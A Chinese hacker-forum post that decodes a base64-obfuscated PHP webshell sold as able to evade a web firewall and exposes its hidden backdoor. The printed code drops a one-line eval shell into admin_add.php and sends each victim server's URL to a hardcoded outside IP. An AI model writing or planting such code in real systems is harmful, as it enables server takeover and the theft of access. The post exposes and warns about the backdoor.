http://www.ihonker.org/thread-3338-1-1.html
看了这个帖子很有兴趣的下载下来,还没测试,居然传说是过狗的,,俺就先看看代码是怎么实现过狗的,base64不多说 解密。
挖了个擦、
if($_GET['url']=='admin')
{
fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
}
fputs(fopen('admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
if($pass) {
if ($action == 'login') {
if ($pass == encode_pass($password)) {
$url=$_SERVER['SERVER_NAME'].':'.$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
file_get_contents('http://199.193.66.146/get.php?url='.$url);
scookie('loginpass',encode_pass($password));
@header('Location: '.$self);
由于本屌还是小学生,不懂这些,就研究了一下。<?php eval($_GET["looksb"]);?>'); 这个不是传说中的一句话嘛?
这个名为过狗大马的php马,为什么还有一句话呢? 或许是多功能吧,一句话+大马。
本屌丝看不懂。
继续向下看。
http://199.193.66.146/get.php?url='.$url 我类个去。这据代码是啥我不多说了
居然把url get到这个地址、奶奶个球的、访问了一下这个地址
http://199.193.66.146/get.php
需要提交参数。回头俺上burp给你传送点shell拿着玩。
http://199.193.66.146
Access forbidden!
You don't have permission to access the requested directory. There is either no index document or the directory is read-protected.
If you think this is a server error, please contact the webmaster.
Error 403
199.193.66.146
Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16
提示按没权限。好吧。
admin_add.php','w+'),'<?php eval($_GET["looksb"]);?>');
admin_add.php 尼玛这么吊。没看到过这么吊的后门、
反正本屌不知道这是不是后门。以上内容是俺瞎猜的,大牛可别打俺。俺是新来的。
来个图吧
不说了,说多有人打俺。
http://199.193.66.146/get.php?url='.$url
既然这么 喜欢收集 好吧。俺去用burp给你get点url
浪费了俺1JJ 还给俺 |
发表于 2014-7-9 22:13:02
是的 就是传说中的后门 